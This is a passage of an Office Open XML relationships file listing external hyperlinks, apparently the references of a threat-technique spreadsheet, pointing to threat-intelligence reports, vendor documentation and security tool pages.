Target="https://kubernetes.io/docs/concepts/security/controlling-access/" TargetMode="External"/><Relationship Id="rId1490" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/stage-2-security/anchor-dns-malware-family-goes-cross-platform-d807ba13ca30" TargetMode="External"/><Relationship Id="rId2127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redcanary.com/blog/netwire-remote-access-trojan-on-linux/" TargetMode="External"/><Relationship Id="rId2334" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://researchcenter.paloaltonetworks.com/2018/03/unit42-sofacy-uses-dealerschoice-target-european-government-agency/" TargetMode="External"/><Relationship Id="rId2779" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/" TargetMode="External"/><Relationship Id="rId2986" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://exatrack.com/public/Tricephalic_Hellkeeper.pdf" TargetMode="External"/><Relationship Id="rId306" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf" TargetMode="External"/><Relationship Id="rId860" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2019/10/mahalo-fin7-responding-to-new-tools-and-techniques.html" TargetMode="External"/><Relationship Id="rId958" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.google.com/iam/docs/service-account-monitoring" TargetMode="External"/><Relationship Id="rId1143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ired.team/offensive-security/defense-evasion/windows-api-hashing-in-malware" TargetMode="External"/><Relationship Id="rId1588" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/security/blog/2020/03/09/real-life-cybercrime-stories-dart-microsoft-detection-and-response-team" TargetMode="External"/><Relationship Id="rId1795" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720" TargetMode="External"/><Relationship Id="rId2541" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/en-us/library/bb490947.aspx" TargetMode="External"/><Relationship Id="rId2639" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf" TargetMode="External"/><Relationship Id="rId2846" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.whois.net/" TargetMode="External"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://airbus-cyber-security.com/fileless-malware-behavioural-analysis-kovter-persistence/" TargetMode="External"/><Relationship Id="rId513" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques" TargetMode="External"/><Relationship Id="rId720" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/" TargetMode="External"/><Relationship Id="rId818" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" TargetMode="External"/><Relationship Id="rId1350" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf" TargetMode="External"/><Relationship Id="rId1448" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://digital-forensics.sans.org/summit-archives/2010/35-glyer-apt-persistence-mechanisms.pdf" TargetMode="External"/><Relationship Id="rId1655" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/iis/configuration/system.webserver/security/isapicgirestriction/" TargetMode="External"/><Relationship Id="rId2401" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions" TargetMode="External"/><Relationship Id="rId2706" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games" TargetMode="External"/><Relationship Id="rId1003" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/gentilkiwi/mimikatz/issues/92" TargetMode="External"/><Relationship Id="rId1210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/" TargetMode="External"/><Relationship Id="rId1308" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://lolbas-project.github.io/lolbas/Binaries/Wmic/" TargetMode="External"/><Relationship Id="rId1862" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://us-cert.cisa.gov/sites/default/files/publications/AR-17-20045_Enhanced_Analysis_of_GRIZZLY_STEPPE_Activity.pdf" TargetMode="External"/><Relationship Id="rId2913" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://witsendandshady.blogspot.com/2019/06/lab-notes-persistence-and-privilege.html" TargetMode="External"/><Relationship Id="rId1515" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens" TargetMode="External"/><Relationship Id="rId1722" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/powershell/module/microsoft.powershell.core/about/about_profiles" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf" TargetMode="External"/><Relationship Id="rId2191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.blackhat.com/presentations/bh-usa-05/bh-us-05-boileau.pdf" TargetMode="External"/><Relationship Id="rId3035" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://objective-see.com/blog/blog_0x25.html" TargetMode="External"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html" TargetMode="External"/><Relationship Id="rId370" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tools.cisco.com/security/center/resources/integrity_assurance.html" TargetMode="External"/><Relationship Id="rId2051" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside" TargetMode="External"/><Relationship Id="rId2289" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.secureworks.com/research/revil-sodinokibi-ransomware" TargetMode="External"/><Relationship Id="rId2496" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html" TargetMode="External"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf" TargetMode="External"/><Relationship Id="rId468" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.crowdstrike.com/blog/widespread-dns-hijacking-activity-targets-multiple-sectors/" TargetMode="External"/><Relationship Id="rId675" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/2018/12/28/analysis-latest-emotet-propagation-campaign/" TargetMode="External"/><Relationship Id="rId882" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html" TargetMode="External"/><Relationship Id="rId1098" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/" TargetMode="External"/><Relationship Id="rId2149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/" TargetMode="External"/><Relationship Id="rId2356" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://posts.specterops.io/head-in-the-clouds-bd038bb69e48" TargetMode="External"/><Relationship Id="rId2563" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/bb490717.aspx" TargetMode="External"/><Relationship Id="rId2770" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/" TargetMode="External"/><Relationship Id="rId328" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://research.checkpoint.com/2020/ransomware-alert-pay2key/" TargetMode="External"/><Relationship Id="rId535" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cylance.com/content/dam/cylance-web/en-us/resources/knowledge-center/resource-library/reports/WhiteCompanyOperationShaheenReport.pdf?_ga=2.161661948.1943296560.1555683782-1066572390.1555511517" TargetMode="External"/><Relationship Id="rId742" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/blog/how-hunt-detecting-persistence-evasion-com" TargetMode="External"/><Relationship Id="rId1165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.intezer.com/evidence-aurora-operation-still-active-supply-chain-attack-through-ccleaner/" TargetMode="External"/><Relationship Id="rId1372" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/en-us/library/50614e95.aspx" TargetMode="External"/><Relationship Id="rId2009" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://researchcenter.paloaltonetworks.com/2016/02/nanocorerat-behind-an-increase-in-tax-themed-phishing-e-mails/" TargetMode="External"/><Relationship Id="rId2216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.secureworks.com/research/the-curious-case-of-mia-ash" TargetMode="External"/><Relationship Id="rId2423" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group" TargetMode="External"/><Relationship Id="rId2630" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-shows-off-new-trick-password-grabber-module/" TargetMode="External"/><Relationship Id="rId2868" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/HTTP_Public_Key_Pinning" TargetMode="External"/><Relationship Id="rId602" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeSecurityGroups.html" TargetMode="External"/><Relationship Id="rId1025" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/byt3bl33d3r/SILENTTRINITY" TargetMode="External"/><Relationship Id="rId1232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/files/2016/07/The-ProjectSauron-APT_research_KL.pdf" TargetMode="External"/><Relationship Id="rId1677" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/en-us/library/windows/desktop/aa378184(v=vs.85).aspx" TargetMode="External"/><Relationship Id="rId1884" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF" TargetMode="External"/><Relationship Id="rId2728" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.us-cert.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices" TargetMode="External"/><Relationship Id="rId2935" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.zscaler.com/blogs/security-research/lyceum-net-dns-backdoor" TargetMode="External"/><Relationship Id="rId907" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2021/03/sunshuttle-second-stage-backdoor-targeting-us-based-entity.html" TargetMode="External"/><Relationship Id="rId1537" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/win32/bits/about-bits" TargetMode="External"/><Relationship Id="rId1744" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/library/cc245496.aspx" TargetMode="External"/><Relationship Id="rId1951" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://researchcenter.paloaltonetworks.com/2017/10/unit42-oilrig-group-steps-attacks-new-delivery-documents-new-injector-trojan/" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cybersecurity.att.com/blogs/labs-research/lazarus-campaign-ttps-and-evolution" TargetMode="External"/><Relationship Id="rId1604" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/" TargetMode="External"/><Relationship Id="rId3057" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sentinelone.com/labs/resourceful-macos-malware-hides-in-named-fork/" TargetMode="External"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://o365blog.com/post/pta/" TargetMode="External"/><Relationship Id="rId1811" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Win32/Truvasys.A!dha" TargetMode="External"/><Relationship Id="rId1909" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nmap.org/book/firewalls.html" TargetMode="External"/><Relationship Id="rId392" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.clearskysec.com/wp-content/uploads/2019/06/Clearsky-Iranian-APT-group-%E2%80%98MuddyWater%E2%80%99-Adds-Exploits-to-Their-Arsenal.pdf" TargetMode="External"/><Relationship Id="rId697" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.welivesecurity.com/wp-content/uploads/2018/09/ESET-LoJax.pdf" TargetMode="External"/><Relationship Id="rId2073" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx" TargetMode="External"/><Relationship Id="rId2280" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.secureworks.com/research/threat-profiles/iron-tilden" TargetMode="External"/><Relationship Id="rId2378" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning" TargetMode="External"/><Relationship Id="rId252" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf" TargetMode="External"/><Relationship Id="rId1187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/jay/gethooks" TargetMode="External"/><Relationship Id="rId2140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2021/01/remediation-and-hardening-strategies-for-microsoft-365-to-defend-against-unc2452.html" TargetMode="External"/><Relationship Id="rId2585" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://threatpost.com/fin7-backdoor-ethical-hacking-tool/166194/" TargetMode="External"/><Relationship Id="rId2792" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unit42.paloaltonetworks.com/acidbox-rare-malware/" TargetMode="External"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/" TargetMode="External"/><Relationship Id="rId557" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://us-cert.cisa.gov/ncas/alerts/aa20-302a" TargetMode="External"/><Relationship Id="rId764" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.eventtracker.com/tech-articles/monitoring-file-permission-changes-windows-security-log/" TargetMode="External"/><Relationship Id="rId971" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gtfobins.github.io/" TargetMode="External"/><Relationship Id="rId1394" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mcafee.com/blogs/other-blogs/mcafee-labs/macro-malware-targets-macs/" TargetMode="External"/><Relationship Id="rId1699" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-privileges-to-facilitate-broader-attacks" TargetMode="External"/><Relationship Id="rId2000" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/" TargetMode="External"/><Relationship Id="rId2238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securelist.com/evolution-of-jsworm-ransomware/102428/" TargetMode="External"/><Relationship Id="rId2445" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-sunburst-sending-data" TargetMode="External"/><Relationship Id="rId2652" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://documents.trendmicro.com/assets/wp/wp-operation-woolen-goldfish.pdf" TargetMode="External"/><Relationship Id="rId417" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.datawire.io/code-injection-on-linux-and-macos/" TargetMode="External"/><Relationship Id="rId624" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.docker.com/engine/reference/commandline/dockerd/" TargetMode="External"/><Relationship Id="rId831" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html" TargetMode="External"/><Relationship Id="rId1047" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/zerosum0x0/koadic" TargetMode="External"/><Relationship Id="rId1254" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.kernel.org/doc/html/latest/security/self-protection.html" TargetMode="External"/><Relationship Id="rId1461" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e" TargetMode="External"/><Relationship Id="rId2305" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sensepost/ruler" TargetMode="External"/><Relationship Id="rId2512" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.techrepublic.com/blog/the-enterprise-cloud/backing-up-and-restoring-snapshots-on-amazon-ec2-machines/" TargetMode="External"/><Relationship Id="rId2957" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.blackhillsinfosec.com/bypass-web-proxy-filtering/" TargetMode="External"/><Relationship Id="rId929" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://expel.io/blog/following-cloudtrail-generating-aws-security-signals-sumo-logic/" TargetMode="External"/><Relationship Id="rId1114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631" TargetMode="External"/><Relationship Id="rId1321" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-campaign-targeting-cryptocurrencies-reveals-remote-controller-tool-evolved-ratankba/" TargetMode="External"/><Relationship Id="rId1559" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/library/windows/desktop/bb968799.aspx" TargetMode="External"/><Relationship Id="rId1766" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/library/windows/desktop/ms633591.aspx" TargetMode="External"/><Relationship Id="rId1973" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/covid-19-and-new-year-greetings-the-higaisa-group/" TargetMode="External"/><Relationship Id="rId2817" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html" TargetMode="External"/><Relationship Id="rId1419" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.malwarebytes.com/threat-analysis/2020/06/higaisa/" TargetMode="External"/><Relationship Id="rId1626" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/ftp" TargetMode="External"/><Relationship Id="rId1833" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/download/details.aspx?id=21714" TargetMode="External"/><Relationship Id="rId3079" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://versprite.com/blog/exploiting-vyprvpn-for-macos/" TargetMode="External"/><Relationship Id="rId1900" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/" TargetMode="External"/><Relationship Id="rId2095" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/2015.11.04_Evolving_Threats/cct-w08_evolving-threats-dissection-of-a-cyber-espionage-attack.pdf" TargetMode="External"/><Relationship Id="rId274" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a" TargetMode="External"/><Relationship Id="rId481" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.crowdstrike.com/blog/on-demand-webcast-crowdstrike-experts-on-covid-19-cybersecurity-challenges-and-recommendations/" TargetMode="External"/><Relationship Id="rId2162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dirkjanm.io/introducing-roadtools-and-roadrecon-azure-ad-exploration-framework/" TargetMode="External"/><Relationship Id="rId3006" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/" TargetMode="External"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/RunpathDependentLibraries.html" TargetMode="External"/><Relationship Id="rId579" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://speakerdeck.com/patrickwardle/defcon-2017-death-by-1000-installers-its-all-broken?slide=8" TargetMode="External"/><Relationship Id="rId786" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.iranwatch.org/sites/default/files/public-intelligence-alert.pdf" TargetMode="External"/><Relationship Id="rId993" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/hob0/hashjacking" TargetMode="External"/><Relationship Id="rId2467" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.tecmint.com/control-systemd-services-on-remote-linux-server/" TargetMode="External"/><Relationship Id="rId2674" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trendmicro.com/en_us/research/20/i/tricky-forms-of-phishing.html" TargetMode="External"/><Relationship Id="rId341" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.chkrootkit.org/" TargetMode="External"/><Relationship Id="rId439" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/" TargetMode="External"/><Relationship Id="rId646" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.dragos.com/threat/wassonite/" TargetMode="External"/><Relationship Id="rId1069" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cloud.google.com/identity/docs/reference/rest" TargetMode="External"/><Relationship Id="rId1276" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.kroll.com/en/insights/publications/cyber/qakbot-malware-exfiltrating-emails-thread-hijacking-attacks" TargetMode="External"/><Relationship Id="rId1483" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mcafee.com/blogs/other-blogs/mcafee-labs/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems/" TargetMode="External"/><Relationship Id="rId2022" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentestlab.blog/2017/04/03/token-manipulation/" TargetMode="External"/><Relationship Id="rId2327" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_removal_sd_value_scheduled_task_hide.yml" TargetMode="External"/><Relationship Id="rId2881" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Shared_resource" TargetMode="External"/><Relationship Id="rId2979" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/" TargetMode="External"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=nJ0UsyiUEqQ" TargetMode="External"/><Relationship Id="rId506" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware" TargetMode="External"/><Relationship Id="rId853" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin10.pdf" TargetMode="External"/><Relationship Id="rId1136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/" TargetMode="External"/><Relationship Id="rId1690" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/security/blog/2021/12/06/nickel-targeting-government-organizations-across-latin-america-and-europe" TargetMode="External"/><Relationship Id="rId1788" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&amp;threatId=-2147336918" TargetMode="External"/><Relationship Id="rId1995" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/" TargetMode="External"/><Relationship Id="rId2534" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/en-us/library/cc758918(v=ws.10).aspx" TargetMode="External"/><Relationship Id="rId2741" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://2017-2021.state.gov/the-united-states-condemns-russian-cyber-attack-against-the-country-of-georgia/index.html" TargetMode="External"/><Relationship Id="rId2839" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 